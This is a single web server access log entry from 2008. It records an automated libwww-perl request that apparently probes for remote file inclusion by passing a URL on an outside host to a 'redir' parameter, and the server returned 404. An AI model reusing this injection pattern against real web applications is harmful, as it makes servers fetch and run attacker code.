140.113.4.81 - - [17/Apr/2008:17:03:40 -0700] "GET /logs/access_080308.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
